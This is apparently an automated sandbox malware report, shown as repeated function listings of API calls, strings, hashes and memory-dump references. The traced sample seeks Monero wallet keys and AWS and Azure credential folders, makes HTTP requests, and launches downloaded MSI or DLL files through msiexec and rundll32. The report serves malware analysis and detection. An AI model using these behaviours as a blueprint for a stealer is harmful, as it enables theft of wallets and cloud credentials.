                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                        • String ID: "$"$------$------$------
                        • API String ID: 874700897-2180234286
                        • Opcode ID: bb3198d2e23a82761cdc494d79bd5d1dfa340de256b4370f7a0b23c0368cb50f
                        • Instruction ID: 29bf27d7678dbcfd220059cd18bf8f6b54d4fda869ac9720434a066b479c7805
                        • Opcode Fuzzy Hash: bb3198d2e23a82761cdc494d79bd5d1dfa340de256b4370f7a0b23c0368cb50f
                        • Instruction Fuzzy Hash: 5B122F75820118ABDB15EBA1DC95FEEB338BF14701F5442A9F50A72091EF302A8DDF69
                        Function 00C4CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                          • Part of subcall function 00C5A9B0: lstrlen.KERNEL32(?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C5A9C5
                          • Part of subcall function 00C5A9B0: lstrcpy.KERNEL32(00000000), ref: 00C5AA04
                          • Part of subcall function 00C5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C5AA12
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                          • Part of subcall function 00C58B60: GetSystemTime.KERNEL32(00C60E1A,0089C2B8,00C605AE,?,?,00C413F9,?,0000001A,00C60E1A,00000000,?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C58B86
                          • Part of subcall function 00C5A920: lstrcpy.KERNEL32(00000000,?), ref: 00C5A972
                          • Part of subcall function 00C5A920: lstrcat.KERNEL32(00000000), ref: 00C5A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C4CF83
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00C4D0C7
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00C4D0CE
                        • lstrcat.KERNEL32(?,00000000), ref: 00C4D208
                        • lstrcat.KERNEL32(?,00C61478), ref: 00C4D217
                        • lstrcat.KERNEL32(?,00000000), ref: 00C4D22A
                        • lstrcat.KERNEL32(?,00C6147C), ref: 00C4D239
                        • lstrcat.KERNEL32(?,00000000), ref: 00C4D24C
                        • lstrcat.KERNEL32(?,00C61480), ref: 00C4D25B
                        • lstrcat.KERNEL32(?,00000000), ref: 00C4D26E
                        • lstrcat.KERNEL32(?,00C61484), ref: 00C4D27D
                        • lstrcat.KERNEL32(?,00000000), ref: 00C4D290
                        • lstrcat.KERNEL32(?,00C61488), ref: 00C4D29F
                        • lstrcat.KERNEL32(?,00000000), ref: 00C4D2B2
                        • lstrcat.KERNEL32(?,00C6148C), ref: 00C4D2C1
                        • lstrcat.KERNEL32(?,00000000), ref: 00C4D2D4
                        • lstrcat.KERNEL32(?,00C61490), ref: 00C4D2E3
                          • Part of subcall function 00C5A820: lstrlen.KERNEL32(00C44F05,?,?,00C44F05,00C60DDE), ref: 00C5A82B
                          • Part of subcall function 00C5A820: lstrcpy.KERNEL32(00C60DDE,00000000), ref: 00C5A885
                        • lstrlen.KERNEL32(?), ref: 00C4D32A
                        • lstrlen.KERNEL32(?), ref: 00C4D339
                          • Part of subcall function 00C5AA70: StrCmpCA.SHLWAPI(0089AE68,00C4A7A7,?,00C4A7A7,0089AE68), ref: 00C5AA8F
                        • DeleteFileA.KERNEL32(00000000), ref: 00C4D3B4
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                        • String ID:
                        • API String ID: 1956182324-0
                        • Opcode ID: 2628ec2bc85218778fe9befa4c4e9324e538fe25cb02bcb2b815f4388d8260de
                        • Instruction ID: a27d289d0210b5d8817cdc575fa2b1effe4d628fa72a0be1f9e14a1df94a6d67
                        • Opcode Fuzzy Hash: 2628ec2bc85218778fe9befa4c4e9324e538fe25cb02bcb2b815f4388d8260de
                        • Instruction Fuzzy Hash: 2AE162758101089FDB04EBA2DD96EEE7378BF14302F144265F907B7091EE34AA4DEB66
                        Function 00C4C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                          • Part of subcall function 00C5A920: lstrcpy.KERNEL32(00000000,?), ref: 00C5A972
                          • Part of subcall function 00C5A920: lstrcat.KERNEL32(00000000), ref: 00C5A982
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                          • Part of subcall function 00C5A9B0: lstrlen.KERNEL32(?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C5A9C5
                          • Part of subcall function 00C5A9B0: lstrcpy.KERNEL32(00000000), ref: 00C5AA04
                          • Part of subcall function 00C5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C5AA12
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0089F380,00000000,?,00C6144C,00000000,?,?), ref: 00C4CA6C
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00C4CA89
                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00C4CA95
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C4CAA8
                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00C4CAD9
                        • StrStrA.SHLWAPI(?,0089F2A8,00C60B52), ref: 00C4CAF7
                        • StrStrA.SHLWAPI(00000000,0089F218), ref: 00C4CB1E
                        • StrStrA.SHLWAPI(?,0089F848,00000000,?,00C61458,00000000,?,00000000,00000000,?,0089AE08,00000000,?,00C61454,00000000,?), ref: 00C4CCA2
                        • StrStrA.SHLWAPI(00000000,0089FB08), ref: 00C4CCB9
                          • Part of subcall function 00C4C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00C4C871
                          • Part of subcall function 00C4C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00C4C87C
                        • StrStrA.SHLWAPI(?,0089FB08,00000000,?,00C6145C,00000000,?,00000000,0089AD18), ref: 00C4CD5A
                        • StrStrA.SHLWAPI(00000000,0089AF98), ref: 00C4CD71
                          • Part of subcall function 00C4C820: lstrcat.KERNEL32(?,00C60B46), ref: 00C4C943
                          • Part of subcall function 00C4C820: lstrcat.KERNEL32(?,00C60B47), ref: 00C4C957
                          • Part of subcall function 00C4C820: lstrcat.KERNEL32(?,00C60B4E), ref: 00C4C978
                        • lstrlen.KERNEL32(00000000), ref: 00C4CE44
                        • CloseHandle.KERNEL32(00000000), ref: 00C4CE9C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                        • String ID:
                        • API String ID: 3744635739-3916222277
                        • Opcode ID: 39d4adb9366c5e1eba975924900f8d14c3a44226c50f852e683d52840e3fe3db
                        • Instruction ID: e57f9ba344381a2692cbb5eb7de995dab724ee02bf52c915d707b7c22ce92b63
                        • Opcode Fuzzy Hash: 39d4adb9366c5e1eba975924900f8d14c3a44226c50f852e683d52840e3fe3db
                        • Instruction Fuzzy Hash: 4BE1FA75810108AFDB14EBA2DC91FEEB778BF14301F444269F90676191EF306A8EDB66
                        Function 00C58320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                        • RegOpenKeyExA.ADVAPI32(00000000,0089CE10,00000000,00020019,00000000,00C605B6), ref: 00C583A4
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00C58426
                        • wsprintfA.USER32 ref: 00C58459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00C5847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 00C5848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 00C58499
                          • Part of subcall function 00C5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C5A7E6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                        • String ID: - $%s\%s$?
                        • API String ID: 3246050789-3278919252
                        • Opcode ID: 95b30431bafac1d70161ca97211119768153cde22d35fae4f8ea702abf85fd60
                        • Instruction ID: 10638dadd11a50c84f6258961aac001867c077cfd7a37d3b760b0a61fd39d279
                        • Opcode Fuzzy Hash: 95b30431bafac1d70161ca97211119768153cde22d35fae4f8ea702abf85fd60
                        • Instruction Fuzzy Hash: D6812B759101189FEB28DB51CC95FEA77B8FB08701F008299E509A6180DF756BCDCFA5
                        Function 00C54D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00C58DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C58E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 00C54DB0
                        • lstrcat.KERNEL32(?,\.azure\), ref: 00C54DCD
                          • Part of subcall function 00C54910: wsprintfA.USER32 ref: 00C5492C
                          • Part of subcall function 00C54910: FindFirstFileA.KERNEL32(?,?), ref: 00C54943
                        • lstrcat.KERNEL32(?,00000000), ref: 00C54E3C
                        • lstrcat.KERNEL32(?,\.aws\), ref: 00C54E59
                          • Part of subcall function 00C54910: StrCmpCA.SHLWAPI(?,00C60FDC), ref: 00C54971
                          • Part of subcall function 00C54910: StrCmpCA.SHLWAPI(?,00C60FE0), ref: 00C54987
                          • Part of subcall function 00C54910: FindNextFileA.KERNEL32(000000FF,?), ref: 00C54B7D
                          • Part of subcall function 00C54910: FindClose.KERNEL32(000000FF), ref: 00C54B92
                        • lstrcat.KERNEL32(?,00000000), ref: 00C54EC8
                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00C54EE5
                          • Part of subcall function 00C54910: wsprintfA.USER32 ref: 00C549B0
                          • Part of subcall function 00C54910: StrCmpCA.SHLWAPI(?,00C608D2), ref: 00C549C5
                          • Part of subcall function 00C54910: wsprintfA.USER32 ref: 00C549E2
                          • Part of subcall function 00C54910: PathMatchSpecA.SHLWAPI(?,?), ref: 00C54A1E
                          • Part of subcall function 00C54910: lstrcat.KERNEL32(?,008A0710), ref: 00C54A4A
                          • Part of subcall function 00C54910: lstrcat.KERNEL32(?,00C60FF8), ref: 00C54A5C
                          • Part of subcall function 00C54910: lstrcat.KERNEL32(?,?), ref: 00C54A70
                          • Part of subcall function 00C54910: lstrcat.KERNEL32(?,00C60FFC), ref: 00C54A82
                          • Part of subcall function 00C54910: lstrcat.KERNEL32(?,?), ref: 00C54A96
                          • Part of subcall function 00C54910: CopyFileA.KERNEL32(?,?,00000001), ref: 00C54AAC
                          • Part of subcall function 00C54910: DeleteFileA.KERNEL32(?), ref: 00C54B31
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                        • API String ID: 949356159-974132213
                        • Opcode ID: 26e6b491125db47bd8c11b814747166f3a405b6e102494e19b101767c9ae2639
                        • Instruction ID: adaffb248e495b3e4f45bb5c04b71866197b17c0632473664959908cfb76f8af
                        • Opcode Fuzzy Hash: 26e6b491125db47bd8c11b814747166f3a405b6e102494e19b101767c9ae2639
                        • Instruction Fuzzy Hash: 4741A67A9502086BDB24F770DC87FED3338AB24705F444564BA89660C1FEB45BCD9BA2
                        Function 00C59010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                        Download Yara Rule
                        APIs
                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00C5906C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateGlobalStream
                        • String ID: image/jpeg
                        • API String ID: 2244384528-3785015651
                        • Opcode ID: ffeca6fc94dbc993803dead52b05abbe87c65f9c2de0ec925e45204560cddac8
                        • Instruction ID: e192249bb6e4a66666c73c8a29f6de6704a782b85ef005e554ea627a5e3509fa
                        • Opcode Fuzzy Hash: ffeca6fc94dbc993803dead52b05abbe87c65f9c2de0ec925e45204560cddac8
                        • Instruction Fuzzy Hash: 3471F9B5900208EFDB04DFE5DC89FEEB7B8BB48301F148519F619A7290DB34A949DB61
                        Function 00C52E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                        • ShellExecuteEx.SHELL32(0000003C), ref: 00C531C5
                        • ShellExecuteEx.SHELL32(0000003C), ref: 00C5335D
                        • ShellExecuteEx.SHELL32(0000003C), ref: 00C534EA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExecuteShell$lstrcpy
                        • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                        • API String ID: 2507796910-3625054190
                        • Opcode ID: f8842a69d28a291be651e5407ef82bb4f0f7788f022e4b7c88cd0aae26f3e6e0
                        • Instruction ID: 90738c189fb0c27eb87104ae0bbeb5ec724e24f579d0d9c562eb9efa2ca01783
                        • Opcode Fuzzy Hash: f8842a69d28a291be651e5407ef82bb4f0f7788f022e4b7c88cd0aae26f3e6e0
                        • Instruction Fuzzy Hash: F0122F758101189ADB15EBA1DC92FDEB778BF14301F504269F90676091EF302B8EDFAA
                        Function 00C552C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00C5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C5A7E6
                          • Part of subcall function 00C46280: InternetOpenA.WININET(00C60DFE,00000001,00000000,00000000,00000000), ref: 00C462E1
                          • Part of subcall function 00C46280: StrCmpCA.SHLWAPI(?,008A0610), ref: 00C46303
                          • Part of subcall function 00C46280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C46335
                          • Part of subcall function 00C46280: HttpOpenRequestA.WININET(00000000,GET,?,0089FCA0,00000000,00000000,00400100,00000000), ref: 00C46385
                          • Part of subcall function 00C46280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00C463BF
                          • Part of subcall function 00C46280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C463D1
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C55318
                        • lstrlen.KERNEL32(00000000), ref: 00C5532F
                          • Part of subcall function 00C58E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C58E52
                        • StrStrA.SHLWAPI(00000000,00000000), ref: 00C55364
                        • lstrlen.KERNEL32(00000000), ref: 00C55383
                        • lstrlen.KERNEL32(00000000), ref: 00C553AE
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 3240024479-1526165396
                        • Opcode ID: 8bb4595c6b587d1be2b91348b1657c52e6bf0b6b5ed4428e0b51b47813b08762
                        • Instruction ID: 32829629aa3dd6dc52c44a93b62bfa20ac424b0f557b8c282456077985492058
                        • Opcode Fuzzy Hash: 8bb4595c6b587d1be2b91348b1657c52e6bf0b6b5ed4428e0b51b47813b08762
                        • Instruction Fuzzy Hash: BC5120389101089BDB14FF62CD96AED7779BF10302F544128FC0A6A191EF346B8DEB66
                        Function 00C512D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
